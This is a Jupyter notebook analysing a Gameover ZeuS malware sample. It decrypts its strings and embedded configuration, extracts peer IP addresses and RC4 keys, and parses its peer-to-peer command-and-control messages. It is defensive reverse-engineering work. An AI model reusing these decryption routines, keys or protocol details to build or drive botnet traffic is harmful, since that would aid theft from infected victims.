## Initial Setup

1. Download the Gameover version 2014-05-28 reference sample from [MalwareBazaar](https://bazaar.abuse.ch/sample/597fc22a39550c674c3be03b2ba21d9c54571389744d8240a7a1f416bdd2b4a9/).
2. Unpack the sample with [UNPACME](https://www.unpac.me/results/987cd72f-5c7d-4572-aa53-ad06be35d3fa#/).

In [1]:
# Install required Python modules
import sys
!{sys.executable} -m pip install pefile
!{sys.executable} -m pip install pycryptodome

# Import required Python modules
import binascii
import datetime
import hashlib
import pprint
import re
import socket
import struct
import zlib

import pefile

from Crypto.Cipher import ARC4

Defaulting to user installation because normal site-packages is not writeable
Defaulting to user installation because normal site-packages is not writeable


In [2]:
# Load the unpacked sample
fp = open("811223f8d6b9e975fbe3b342736eac6bcaf2563d7f723c268d8ba20f1420f0a0.bin", "rb")
sample = fp.read()
fp.close()

pe = pefile.PE(data=sample)

pe_timestamp = datetime.datetime.fromtimestamp(pe.FILE_HEADER.TimeDateStamp).strftime("%Y-%m-%d")
print(f"PE date: {pe_timestamp}")

PE date: 2014-05-28


## Decrypt Strings

There are two types of encrypted strings.

Pseudocode 1:

    int __fastcall CryptedStrings::_getA(unsigned __int16 a_index, int outbuf)
    {   
      int index; // esi 
      int i; // edx 
      int i_cp; // ecx 
      char pb; // al
      int result; // eax 

      index = a_index;
      for ( i = 0; i < *(&unk_E78DE2 + 4 * index); *(i_cp + outbuf) = pb )
      {   
        i_cp = i;
        pb = i ^ byte_E78DE0[8 * index] ^ *(*(&unk_E78DE4 + 2 * index) + i); 
        ++i;
      }   
      result = *(&unk_E78DE2 + 4 * index);
      *(result + outbuf) = 0;
      return result;
    }

Disassembly 1:

    .text:00EB3EA2                               CryptedStrings___getA proc near
    .text:00EB3EA2
    .text:00EB3EA2 56                                            push    esi 
    .text:00EB3EA3 0F B7 F1                                      movzx   esi, cx
    .text:00EB3EA6 33 C0                                         xor     eax, eax 
    .text:00EB3EA8 57                                            push    edi 
    .text:00EB3EA9 8B FA                                         mov     edi, edx 
    .text:00EB3EAB 33 D2                                         xor     edx, edx 
    .text:00EB3EAD 66 3B 04 F5 E2 8D E7 00                       cmp     ax, word ptr ds:unk_E78DE2[esi*8]
    .text:00EB3EB5 73 24                                         jnb     short loc_EB3EDB
    .text:00EB3EB7
    .text:00EB3EB7                               loc_EB3EB7:
    .text:00EB3EB7 8B 04 F5 E4 8D E7 00                          mov     eax, dword ptr ds:unk_E78DE4[esi*8]
    .text:00EB3EBE 0F B7 CA                                      movzx   ecx, dx
    .text:00EB3EC1 8A 04 08                                      mov     al, [eax+ecx]
    .text:00EB3EC4 32 04 F5 E0 8D E7 00                          xor     al, ds:byte_E78DE0[esi*8]
    .text:00EB3ECB 32 C2                                         xor     al, dl
    .text:00EB3ECD 42                                            inc     edx 
    .text:00EB3ECE 88 04 39                                      mov     [ecx+edi], al
    .text:00EB3ED1 66 3B 14 F5 E2 8D E7 00                       cmp     dx, word ptr ds:unk_E78DE2[esi*8]
    .text:00EB3ED9 72 DC                                         jb      short loc_EB3EB7
    .text:00EB3EDB
    .text:00EB3EDB                               loc_EB3EDB:
    .text:00EB3EDB 0F B7 04 F5 E2 8D E7 00                       movzx   eax, word ptr ds:unk_E78DE2[esi*8]
    .text:00EB3EE3 C6 04 38 00                                   mov     byte ptr [eax+edi], 0
    .text:00EB3EE7 5F                                            pop     edi 
    .text:00EB3EE8 5E                                            pop     esi 
    .text:00EB3EE9 C3                                            retn
    .text:00EB3EE9                               CryptedStrings___getA endp

Pseudocode 2:

    bool s152_init_type_2_enc_strs()
    {
      s152 *s152; // esi
      int buf3442; // eax
      int v2; // eax
      DWORD v3; // eax
      int key; // [esp+4h] [ebp-4h] BYREF

      s152 = g_s152;
      key = 0x5549796C;
      buf3442 = Mem::alloc(3442u);
      if ( !buf3442 )
        return 0;
      *&s152->bufs_1_thru_4 = buf3442;
      v2 = buf3442 + 156;                           // buf1
      *&s152->buf1 = v2;
      v2 += 156;                                    // buf2
      *&s152->buf2 = v2;
      v2 += 2084;                                   // buf3
      *&s152->key_len = 4;
      *&s152->buf3 = v2;
      *&s152->enc_data_addr = &g_enc_data_addr;
      *&s152->max_index_39 = 39;
      *&s152->buf4_key = v2 + 1042;                 // buf4
      memcpy((v2 + 1042), &key, 4u);
      g_s152_2 = s152;
      v3 = TlsAlloc();
      *&s152->tls_index = v3;
      return v3 != -1;
    }

    int __fastcall str_decrypt_op(int enc_data_chunk, int outbuf, int key, unsigned int key_len)
    {
      unsigned int i; // ebx
      unsigned int key_i; // edx

      i = 0;
      key_i = 0;
      while ( 1 )
      {
        *(i + outbuf) = *(enc_data_chunk + i) ^ (i + *(key_i + key));
        key_i = (key_i + 1) % key_len;
        if ( (i & 1) == 0 && !*(outbuf + 2 * (i >> 1)) )
          break;
        ++i;
      }
      return (i >> 1) + 1;
    }

Disassembly 2: 

    .text:00EA1330                               s152_init_type_2_enc_strs proc near
    .text:00EA1330
    .text:00EA1330                               key             = dword ptr -4
    .text:00EA1330
    .text:00EA1330 55                                            push    ebp
    .text:00EA1331 8B EC                                         mov     ebp, esp
    .text:00EA1333 51                                            push    ecx
    .text:00EA1334 56                                            push    esi
    .text:00EA1335 8B 35 48 B7 EC 00                             mov     esi, g_s152
    .text:00EA133B B9 72 0D 00 00                                mov     ecx, 0D72h
    .text:00EA1340 C7 45 FC 6C 79 49 55                          mov     [ebp+key], 5549796Ch
    .text:00EA1347 E8 22 94 02 00                                call    Mem__alloc
    .text:00EA134C 85 C0                                         test    eax, eax
    .text:00EA134E 74 5D                                         jz      short loc_EA13AD
    .text:00EA1350 89 46 18                                      mov     [esi+18h], eax
    .text:00EA1353 05 9C 00 00 00                                add     eax, 9Ch
    .text:00EA1358 89 46 20                                      mov     [esi+20h], eax
    .text:00EA135B 05 9C 00 00 00                                add     eax, 9Ch
    .text:00EA1360 6A 04                                         push    4
    .text:00EA1362 59                                            pop     ecx
    .text:00EA1363 89 46 1C                                      mov     [esi+1Ch], eax
    .text:00EA1366 05 24 08 00 00                                add     eax, 824h
    .text:00EA136B 51                                            push    ecx
    .text:00EA136C 89 4E 34                                      mov     [esi+34h], ecx
    .text:00EA136F 8D 4D FC                                      lea     ecx, [ebp+key]
    .text:00EA1372 89 46 24                                      mov     [esi+24h], eax
    .text:00EA1375 05 12 04 00 00                                add     eax, 412h
    .text:00EA137A 51                                            push    ecx
    .text:00EA137B 50                                            push    eax
    .text:00EA137C C7 46 28 30 7F E7 00                          mov     dword ptr [esi+28h], offset g_enc_data_addr
    .text:00EA1383 C7 46 2C 27 00 00 00                          mov     dword ptr [esi+2Ch], 27h
    .text:00EA138A 89 46 30                                      mov     [esi+30h], eax
    .text:00EA138D FF 15 64 E5 EC 00                             call    ds:memcpy
    .text:00EA1393 83 C4 0C                                      add     esp, 0Ch
    .text:00EA1396 89 35 34 B7 EC 00                             mov     g_s152_2, esi
    .text:00EA139C FF 15 C8 E2 EC 00                             call    ds:TlsAlloc
    .text:00EA13A2 83 F8 FF                                      cmp     eax, 0FFFFFFFFh
    .text:00EA13A5 89 46 54                                      mov     [esi+54h], eax
    .text:00EA13A8 0F 95 C0                                      setnz   al
    .text:00EA13AB EB 02                                         jmp     short loc_EA13AF
    .text:00EA13AD
    .text:00EA13AD
    .text:00EA13AD                               loc_EA13AD:
    .text:00EA13AD 32 C0                                         xor     al, al
    .text:00EA13AF
    .text:00EA13AF                               loc_EA13AF:
    .text:00EA13AF 5E                                            pop     esi
    .text:00EA13B0 8B E5                                         mov     esp, ebp
    .text:00EA13B2 5D                                            pop     ebp
    .text:00EA13B3 C3                                            retn
    .text:00EA13B3                               s152_init_type_2_enc_strs endp

In [3]:
def decrypt_string(pe, id_):
    match = re.search(rb'\x32\x04\xf5(?P<enc_strings_addr>[\s\S]{4})', 
                      pe.get_memory_mapped_image())
    enc_strings_addr = struct.unpack("I", match.group("enc_strings_addr"))[0]
    
    enc_string_addr = enc_strings_addr + 8 * id_
    enc_string_rva = enc_string_addr - pe.OPTIONAL_HEADER.ImageBase
    
    xor_key = pe.get_word_at_rva(enc_string_rva)
    encbuf_len = pe.get_word_at_rva(enc_string_rva + 2)
    encbuf_addr = pe.get_dword_at_rva(enc_string_rva + 4)
    encbuf_rva = encbuf_addr - pe.OPTIONAL_HEADER.ImageBase
    encbuf = pe.get_data(encbuf_rva, encbuf_len)
    
    plainbuf = b""
    for i in range(len(encbuf)):
        pb = (i ^ xor_key ^ encbuf[i]) & 0xff
        plainbuf += struct.pack("B", pb)

    return plainbuf.decode()


print("Type 1 strings:\n")
for i in range(216):
    plain_string = decrypt_string(pe, i)
    print(f"{i}: {plain_string}")


def decrypt_string2(key, enc_string):
    plainbuf = b""
    for i, eb in enumerate(enc_string):
        pb = (eb ^ (i + key[i % len(key)])) & 0xff
        plainbuf += struct.pack("B", pb)
        
    plain_str = plainbuf.split(b"\x00\x00")[0].replace(b"\x00", b"").decode()
    
    return plain_str


match = re.search(rb'\xb9\x72\x0d\x00\x00\xc7\x45[\s\S](?P<key>[\s\S]{4})', pe.get_memory_mapped_image())
key = match.group("key")
    
match = re.search(rb'\xc7\x46\x28(?P<enc_strings_addr>[\s\S]{4})\xc7\x46\x2c(?P<num_entries>[\s\S]{1})\x00\x00\x00', 
                  pe.get_memory_mapped_image())
enc_strings_addr = struct.unpack("I", match.group("enc_strings_addr"))[0]
enc_strings_rva = enc_strings_addr - pe.OPTIONAL_HEADER.ImageBase
num_entries = struct.unpack("B", match.group("num_entries"))[0]

print("\nType 2 strings:\n")
for i in range(0, num_entries*4, 4):
    enc_string_addr = pe.get_dword_at_rva(enc_strings_rva + i)
    enc_string_rva = enc_string_addr - pe.OPTIONAL_HEADER.ImageBase
    enc_string = pe.get_data(enc_string_rva, 256)
    plain_string = decrypt_string2(key, enc_string)
    print(f"{(i//4)+1}: {plain_string}")

Type 1 strings:

0: InstallDate
1: DigitalProductId
2: %s_%s
3: ^UNKNOWN^
4: Local\
5: Global\
6: Software
7: Software\AppDataLow\Software
8: HTTP/1.1
9: User-Agent
10: Host
11: Content-Length
12: Content-Type
13: Content-Encoding
14: Accept-Encoding
15: Transfer-Encoding
16: Referer
17: TE
18: X-BC
19: If-Modified-Since
20: Last-Modified
21: If-None-Match
22: %s:

23: application/x-www-form-urlencoded
24: identity
25: deflate
26: gzip
27: x-gzip
28: https://
29: http://
30: $_PROXY_SERVER_HOST_$
31: $_BOT_ID_$
32: $_SUBBOTNET_$
33: $_BOTNET_ID_$
34: Google Chrome Chromium
35: --type=
36: chrome.dll
37: nss3.dll
38: nspr4.dll
39: PR_OpenTCPSocket
40: PR_Close
41: PR_Poll
42: PR_Read
43: PR_Write
44: PR_GetNameForIdentity
45: PR_SetError
46: PR_GetError
47: PR_GetSocketOption
48: NSS layer
49: Mozilla\Firefox
50: profiles.ini
51: Profile%u
52: IsRelative
53: Path
54: *.dat *.db *.ini *.js *.json *.rdf *.sqlite *.sqlite-* *.txt *.xml
55: firefox\%s.cab
56: wininet.dll
57: winhttp.dll
58:

## Extract Version

I was not able to find an explicit version in the binary. When config and binary updates were exchanged on Gameover's peer-to-peer (P2P) network, a version was included in one of its headers (see below), but as far as I can tell this version only persisted in memory and the registry of an infected host.

## Decrypt BaseConfig

Pseudocode:

    char __thiscall Core::getBaseConfig(_BYTE *a_base_config)
    {   
      int base_config_len; // edi 
      int v3; // ecx 
      char result; // al

      base_config_len = 1492;
      memcpy(a_base_config, &g_enc_base_config, 1492u);
      v3 = dword_ECB764 + dword_ECBD7C - a_base_config;
      do  
      {   
        result = a_base_config[v3];
        *a_base_config++ ^= result;
        --base_config_len;
      }   
      while ( base_config_len );
      return result;
    }   

Disassembly:

    .text:00EA6B98                               Core__getBaseConfig proc near
    .text:00EA6B98
    .text:00EA6B98 56                                            push    esi 
    .text:00EA6B99 57                                            push    edi 
    .text:00EA6B9A BF D4 05 00 00                                mov     edi, 5D4h
    .text:00EA6B9F 8B F1                                         mov     esi, ecx 
    .text:00EA6BA1 57                                            push    edi 
    .text:00EA6BA2 68 10 71 E7 00                                push    offset g_enc_base_config
    .text:00EA6BA7 56                                            push    esi 
    .text:00EA6BA8 FF 15 64 E5 EC 00                             call    ds:memcpy
    .text:00EA6BAE 8B 0D 7C BD EC 00                             mov     ecx, dword_ECBD7C
    .text:00EA6BB4 83 C4 0C                                      add     esp, 0Ch 
    .text:00EA6BB7 03 0D 64 B7 EC 00                             add     ecx, dword_ECB764
    .text:00EA6BBD 2B CE                                         sub     ecx, esi 
    .text:00EA6BBF
    .text:00EA6BBF                               loc_EA6BBF:
    .text:00EA6BBF 8A 04 31                                      mov     al, [ecx+esi]
    .text:00EA6BC2 30 06                                         xor     [esi], al
    .text:00EA6BC4 46                                            inc     esi 
    .text:00EA6BC5 4F                                            dec     edi 
    .text:00EA6BC6 75 F7                                         jnz     short loc_EA6BBF
    .text:00EA6BC8 5F                                            pop     edi 
    .text:00EA6BC9 5E                                            pop     esi 
    .text:00EA6BCA C3                                            retn
    .text:00EA6BCA                               Core__getBaseConfig endp

In [4]:
match = re.search(rb'\xbf(?P<encbuf_len>[\s\S]{2}\x00\x00)[\s\S]{3}\x68(?P<encbuf_addr>[\s\S]{4})',
                    pe.get_memory_mapped_image())

encbuf_len = struct.unpack("I", match.group("encbuf_len"))[0]
encbuf_addr = struct.unpack("I", match.group("encbuf_addr"))[0]
encbuf_rva = encbuf_addr - pe.OPTIONAL_HEADER.ImageBase
encbuf = pe.get_data(encbuf_rva, encbuf_len)

section = pe.sections[3]
xor_key = pe.get_data(section.VirtualAddress, encbuf_len)

base_config = b""
for i, eb in enumerate(encbuf):
    pb = eb ^ xor_key[i % len(xor_key)]
    base_config += struct.pack("B", pb)
    
print(base_config)

b'q;\xff<\x190\x95Yb\xbc\xfbIkRi\xb4Sc\x197N%\xfdO\xf8\x93\xb1y\xe9\xb5\xaf\x97\x89!\xc2\x96%\xc2\xbdNC\xd8l\xa93@\xcb\x08\xe7\xf6v\xe2\x05\xd8a\xae9\xac\xc9\x04\xd0ej\xff\x83\xa2\xf3\xe5\x90x\xb7\n\x10q\xa5\xf1\x84\xd4z\xb5\xb1\'5\xa7\xae\xf32\x009\x000\x005\x00U\x00K\x00d\x00w\x00\x00\x00p\x90\x8ei\x85\x97\xde\x83X\x00>\xceq\xfe\xa5\xb6\xa3\xeb\x95\x05\x9d\x8cML\xbb\x96?\x85"q\xc4\xf6\x0b;\x0fY_\x10_9\x85\x89y\x9f\xb3\x15\x00\x00\x1c!\x19\x0c\xd2\x14D\xc2I\x19*f\x98\xc4\xa8\xb7\x8a}\x10\x089\xc8f\xa3\n\x0c\x0f8<BP\x9c\xf8:\x05#bE \xa8\xc1\x1au\x17\xba\xb7\xd9~\x04\xda\xe9K\xbc9\rZD]cA\x82;6\xcc7\xea\xb3\x99\xae\xd7\xc3S\x8a\x1e\xdb\x84{\xd8\x00O[\xebJs\xe3\x10\xf1\xa5\xe8\xec\t\xaf\xf6\x011\xf0\xc4\x19\x9a=\x7fo\xc8i\\\x91\xf4\x16\x92U\x98\xcandm\xa2C\xab\xd2\x96a\xa9q\xc7\xfc\x97\xb4x\x06-\x8e\xf2\xe5\xad*|^\xfb\x0e\xbf\x02\xd0\x9d\xb8\xcfG\xee\x80gzM.\xbd\x0brt\x87\xd1\x03\x9f\x89\x1cY\xf3&`\x93@\xd3\xaa5"\xce\xdf(\x15\x9b\xa0\xc2\xa4\xb6\x88>\xe2Ie\x18\xbe\xef\xd4\'\xb0%\xb1\xac\x

## Parse BaseConfig

In [5]:
subbotnet = base_config[0x56:0x56+40].split(b"\x00\x00")[0].decode()
print(f"subbotnet: {subbotnet}\n")

botnet = struct.unpack("I", base_config[0x94:0x94+4])[0]
print(f"botnet: {botnet}\n")

baseKey = base_config[0xaf:0xaf+258]
print(f"baseKey: {baseKey}\n")

peer_data = base_config[0x205:0x205+20*45]
peers = []
for i in range(0, len(peer_data), 45):
    peer_chunk = peer_data[i:i+45]
    
    peer = {}
    peer["flags"] = peer_chunk[0]
    peer["rc4_key"] = peer_chunk[1:1+20]
    peer["ipv4"] = socket.inet_ntop(socket.AF_INET, peer_chunk[21:21+4])
    peer["ipv4_udp_port"] = struct.unpack("H", peer_chunk[25:25+2])[0]
    peer["ipv6"] = socket.inet_ntop(socket.AF_INET6, peer_chunk[27:27+16])
    peer["ipv6_udp_port"] = struct.unpack("H", peer_chunk[43:43+2])[0]
    peers.append(peer)

for i, peer in enumerate(peers):
    print(f"\nPeer {i}:\n")
    pprint.pprint(peer)

subbotnet: 2 9 0 5 U K d w

botnet: 5555

baseKey: b'\xa3\n\x0c\x0f8<BP\x9c\xf8:\x05#bE \xa8\xc1\x1au\x17\xba\xb7\xd9~\x04\xda\xe9K\xbc9\rZD]cA\x82;6\xcc7\xea\xb3\x99\xae\xd7\xc3S\x8a\x1e\xdb\x84{\xd8\x00O[\xebJs\xe3\x10\xf1\xa5\xe8\xec\t\xaf\xf6\x011\xf0\xc4\x19\x9a=\x7fo\xc8i\\\x91\xf4\x16\x92U\x98\xcandm\xa2C\xab\xd2\x96a\xa9q\xc7\xfc\x97\xb4x\x06-\x8e\xf2\xe5\xad*|^\xfb\x0e\xbf\x02\xd0\x9d\xb8\xcfG\xee\x80gzM.\xbd\x0brt\x87\xd1\x03\x9f\x89\x1cY\xf3&`\x93@\xd3\xaa5"\xce\xdf(\x15\x9b\xa0\xc2\xa4\xb6\x88>\xe2Ie\x18\xbe\xef\xd4\'\xb0%\xb1\xac\x1f\xa6\x1d3\x8f\xf9l\x1bwf\xd62\xcd\xfe\x12\xb2\xc04\x86_0\xed\xdc\xf7\xde\xc9\xe4h\xc5H\xd5)vW\xbbX\x8dL\xa1\x90T$\xffN\xe1k\x8b\xe0\x83/\x94yj\x95\x85}\x9e\x81\xe6pQ\xfd\xcb\xe7R\xfa,\x07\xb9\x14F\x11+\xa7\x08\x8c!\xdd\xc6\xb5\xf5V\x13?\x00\x00'


Peer 0:

{'flags': 0,
 'ipv4': '130.192.23.69',
 'ipv4_udp_port': 1251,
 'ipv6': '::',
 'ipv6_udp_port': 0,
 'rc4_key': b'\xd4\xd7\xea\x96)V\x83\xf0V5\xb5\xfb\xf9\x1aP\x1di\xb6\x19\xc2'}

Peer 1:

{'f

In [6]:
%%html
<style>
table {margin-left: 0 !important;}
</style>

## Peer-to-Peer (P2P) Protocol

Gameover used a peer-to-peer (P2P) protocol as its primary command and control (C2) mechanism. It was used to exchange peer data, configuration and binary updates, poll for bot commands, and exfil stolen data. The following are good references about its functionality:

- [ZeuS-P2P
monitoring and analysis](https://web.archive.org/web/20130619073309/http://www.cert.pl/PDF/2013-06-p2p-rap_en.pdf)
- [GameOver Zeus – Backgrounds on the Badguys and the Backends](https://web.archive.org/web/20150907133543/https://www.fox-it.com/en/files/2015/08/FoxIT-Whitepaper_Blackhat-web.pdf)
- [Gameover Zeus -- Bad Guys and Backends](https://www.blackhat.com/docs/us-15/materials/us-15-Peterson-GameOver-Zeus-Badguys-And-Backends.pdf)

VirusTotal has a [PCAP](https://www.virustotal.com/gui/file/597fc22a39550c674c3be03b2ba21d9c54571389744d8240a7a1f416bdd2b4a9) of an active P2P session for the analyzed sample.

The P2P protocol used a number of commands. Some commands used UDP and some used TCP. Each command was composed of a header, data, and random padding. The command was encrypted with RC4 using a peer-specific key (see the example peer data from the BaseConfig above.) The peer's RC4 key is also known as the the peer's ID.

The header was 44-bytes:

|Offset|Name|Size|
|:-----|:---|:---|
|0x00|field_0|byte|
|0x01|field_1|byte|
|0x02|padding_length|byte|
|0x03|command|byte|
|0x04|session_id|20 bytes|
|0x18|sender_rc4_key / sender_id|20 bytes|

It seems `field_0` was used with UDP traffic and denotes whether to use VisualDecrypt after RC4. This might of been used for backward compatibility for an older version of the protocol. `field_1` seems to of been used in various TCP commands as an argument, notably:

- time-to-live (TTL) value when broadcasting data to other peers
- data type for requests

A random `session_id` was generated for each session.

Bot commands and data exfiltration used special "super peers". These super peers were selected by the bot operator and then acted like a proxy relaying data between a peer and a backend C2 server.

In [7]:
def decrypt_p2p_command(rc4_key, encbuf):
    rc4 = ARC4.new(rc4_key)
    plainbuf = rc4.decrypt(encbuf)
    
    return plainbuf

def parse_p2p_command(data):
    field_0 = data[0]
    print(f"{field_0=}")
    
    field_1 = data[1]
    print(f"{field_1=}")
    
    padding_length = data[2]
    print(f"{padding_length=}")

    command = data[3]
    print(f"{command=}")
    
    session_id = data[4:4+20]
    print(f"{session_id=}")
    
    sender_rc4_key = data[24:24+20]
    print(f"{sender_rc4_key=}")
    
    command_data = data[44:-padding_length]
    print(f"{command_data=}")
    
    padding = data[-padding_length:]
    print(f"{padding=}")
    
    not_session_id_0 = (~session_id[0]) & 0xff
    if field_0 != not_session_id_0:
        print(f"field0 != ~session_id[0]: {field_0} / {not_session_id_0}")
        
    not_session_id_1 = (~session_id[1]) & 0xff
    if field_1 != not_session_id_1:
        print(f"field_1 != ~session_id[1]: {field_1} / {not_session_id_1}")
    
    return command, command_data


victim_rc4_key = b'Di\xc7\rK\x01\xb7\xaa_\x94\xc8n\x1f\xafN\x85a\x1fv\xa3'
peer_rc4_key = peers[0]["rc4_key"]

## UDP Command 0: Version Request

In [8]:
udp_data = binascii.unhexlify("a896d30bf6d86de3e1f0ab91b466d9f0e68dd55fa0e7f99a6497406a9226cd7b5e554da27c446a859cabd10f83ef7672e52bb01ef949e04658f4fa20a5f75448c3c4b3ce419928b8efb2b17c7dfac0f8a1a758b99e3b0a9113bfbac6bb30db62fe41ed73f3e6fc23cfb9cfd6fa7769bd86bd08f18ef898ac4e3354e970b6c994b60dcb47788799fb7826cedba349c8f631545af3102d142d0799")
plainbuf = decrypt_p2p_command(peer_rc4_key, udp_data)
command, command_data = parse_p2p_command(plainbuf)

print(f"\nParsed command {command} data:\n")

request_super_peers_flag = struct.unpack("I", command_data[0:4])[0]
print(f"{request_super_peers_flag=}")

rand4 = command_data[4:8]
print(f"{rand4=}")

field_0=5
field_1=61
padding_length=102
command=0
session_id=b'\xfa\xc2\x82\x18L\x86\xed\xa3J\x89\xe9\x88\x08\x19\xf4\xa0\x03<\xc6\xa5'
sender_rc4_key=b'Di\xc7\rK\x01\xb7\xaa_\x94\xc8n\x1f\xafN\x85a\x1fv\xa3'
command_data=b'\x01\x00\x00\x00Q\xd2\x98n'
padding=b'\xf9\x98B\xd1\xda8\xcb\x93\x1e\x84\xfb~\xa7\xde\xec\xb5\xd2\x8a\x00\x91\x1b\xa1#\xc3{g\xb2\x85\xcc\xd9\xa4>\xba\x82\x98\xee\xbaxI\xf3H\xec\xe2)\x9b6u\x15oE{\x94\x17\x88~\x8e\x05\xda\x15\x01D|\x90w\x12\xcf\xf6\xce\xda\xb2\xe2U\xcb\xf8\xd2,\xb3l\xf5\xc5\xc7B\xbdi}(\x93s\x97\x91ZO\xdfmP\xaeQ\x92\xa2\x0c\xa6g'

Parsed command 0 data:

request_super_peers_flag=1
rand4=b'Q\xd2\x98n'


## UDP Command 1: Version Response

In [9]:
udp_data = binascii.unhexlify("1e6a7a3cc47dfa95a944aa3306154074c5c9f6518f6bb4bc6c90bccdcacf1d699d39cf501b3d6401d7f3659ec95f6965baea706945b4e2727a37b3291a41c8eeac3e4b23c2f671e69b28a6101d0cc930753269f3806b4ce0c3d5f10ee8054985200c9d52c986e566eb3e1d61aac08a2998e8cba033b80e9b44318f0a9eb78c60")
plainbuf = decrypt_p2p_command(victim_rc4_key, udp_data)
command, command_data = parse_p2p_command(plainbuf)

print(f"\nParsed command {command} data:\n")

binary_version = struct.unpack("I", command_data[0:4])[0]
print(f"{binary_version=}")

config_version = struct.unpack("I", command_data[4:8])[0]
print(f"{config_version=}")

tcp_port = struct.unpack("H", command_data[8:10])[0]
print(f"{tcp_port=}")

rand12 = command_data[10:]
print(f"{rand12=}")

field_0=5
field_1=61
padding_length=62
command=1
session_id=b'\xfa\xc2\x82\x18L\x86\xed\xa3J\x89\xe9\x88\x08\x19\xf4\xa0\x03<\xc6\xa5'
sender_rc4_key=b'\xd4\xd7\xea\x96)V\x83\xf0V5\xb5\xfb\xf9\x1aP\x1di\xb6\x19\xc2'
command_data=b'\tR\xe9\x04\xb3b)\x05\x8a&f\xd5\xach\xbdD\x10T\xd6\xb1p\xff'
padding=b'\xff\x93\x8f^ \xac\x98\x9en\xb7r\xbbH\x0c!\xc3+@\xe8\xdb\xf8\xaf\xbd2\xa3j\xc2\xdb\x10\xf7\xc9X\xb9$\x86\xf5\xf9\x86\'\x91\xa7\xf8\xbav\xf1\xfd\xe9\xfa\x1e\xe8x\xfe\xfd\xe4r\xd8\xb1\x876"\x05*'

Parsed command 1 data:

binary_version=82399753
config_version=86598323
tcp_port=9866
rand12=b'f\xd5\xach\xbdD\x10T\xd6\xb1p\xff'


## UDP Command 2: Peer Data Request

In [10]:
udp_data = binascii.unhexlify("e675b109b83b4a4fad514554ed197054ba76fff59cbcdba66497406a9226cd7b5e554da27c446a859cabd10f56389ce49dafab8056e4176c7bd661aed2c5b6f4de80a17954985b8bc83cb5c2")
plainbuf = decrypt_p2p_command(peer_rc4_key, udp_data)
command, command_data = parse_p2p_command(plainbuf)

print(f"\nParsed command {command} data:\n")

peer_id = command_data[0:20]
print(f"{peer_id=}")

rand8 = command_data[20:28]
print(f"{rand8=}")

field_0=75
field_1=222
padding_length=4
command=2
session_id=b"\xb4!\xa5\xb4\x00'\x03f\x13\xf6@,T\xe2\xde\n?g\xe4\x99"
sender_rc4_key=b'Di\xc7\rK\x01\xb7\xaa_\x94\xc8n\x1f\xafN\x85a\x1fv\xa3'
command_data=b'\xd4\xd7\xea\x96)V\x83\xf0V5\xb5\xfb\xf9\x1aP\x1di\xb6\x19\xc2\xba\x9a\xfe\x02\xc7\x8bs\xa2'
padding=b"</'}"

Parsed command 2 data:

peer_id=b'\xd4\xd7\xea\x96)V\x83\xf0V5\xb5\xfb\xf9\x1aP\x1di\xb6\x19\xc2'
rand8=b'\xba\x9a\xfe\x02\xc7\x8bs\xa2'


## UDP Command 3: Peer Data Response

In [11]:
udp_data = binascii.unhexlify("50894a3e8a9edd39e5e544f65f6ae9d09932dcfbb33096806c90bccdcacf1d699d39cf501b3d6401d7f3659ec0d928adc7ae1bbe8b5ef7f57af5857d66e97d0d5386040e96fd5deff5098969bcb032ca1d6972838f7adeeb0ee78799a2992eccb64acebf4887947f0e07ac4b85483903913bf14d5e86b71acce3271205308a3587309284bb3a0af0c41824459b516dbac5a73333c72ab5b0d396c6fbb73f6badb13015ba8383528378d899df575c9187fc3f71957394305ae6df32dd55708b827d9536c011019322e2b6e47eeb6dca7718ed01a08ac7b197d359e2ae8eceae9ad436bdfffe997f1d691dcd9c00881faaac8833a71c633d04942b522b201f12097663edb63fe4f9547d42bc28416d6ae83ffd00e36a2e0352f9bc8784c484d5c3ff015d064582666c2b125fc34217437b79a90bd81d33f9eb95dac48c7ea31bee2adcdd9888bd875abfbffcc3d8a2ad127b50716d66b144ab68b80b1c87c5f496f1e719227cd638dde1f2ee534a26405f338b99ecabc4b1d925a0a919c25beafd3aaba5310e8976ec7741da2f009d1022237c53dc33ddb55c53c3ccc3ced7ea759d14612d2d955c80c53cee43eec95ee73fabc84940b60d623fb8c25676298f84e057ac665541ea7cd3361fc8f44145aebd63d82ba8515a659c8033d005de7f581f71f836ca7cc4db4eb87989f0b98e6869b1f6e195e4f8c75105afd5")
plainbuf = decrypt_p2p_command(victim_rc4_key, udp_data)
command, peer_data = parse_p2p_command(plainbuf)

print(f"\nParsed command {command} data:")

pcap_peers = []
for i in range(0, len(peer_data), 45):
    peer_chunk = peer_data[i:i+45]
    
    peer = {}
    peer["flags"] = peer_chunk[0]
    peer["rc4_key"] = peer_chunk[1:1+20]
    peer["ipv4"] = socket.inet_ntop(socket.AF_INET, peer_chunk[21:21+4])
    peer["ipv4_udp_port"] = struct.unpack("H", peer_chunk[25:25+2])[0]
    peer["ipv6"] = socket.inet_ntop(socket.AF_INET6, peer_chunk[27:27+16])
    peer["ipv6_udp_port"] = struct.unpack("H", peer_chunk[43:43+2])[0]
    pcap_peers.append(peer)

for i, peer in enumerate(pcap_peers):
    print(f"\nPeer {i}:\n")
    pprint.pprint(peer)

field_0=75
field_1=222
padding_length=14
command=3
session_id=b"\xb4!\xa5\xb4\x00'\x03f\x13\xf6@,T\xe2\xde\n?g\xe4\x99"
sender_rc4_key=b'\xd4\xd7\xea\x96)V\x83\xf0V5\xb5\xfb\xf9\x1aP\x1di\xb6\x19\xc2'
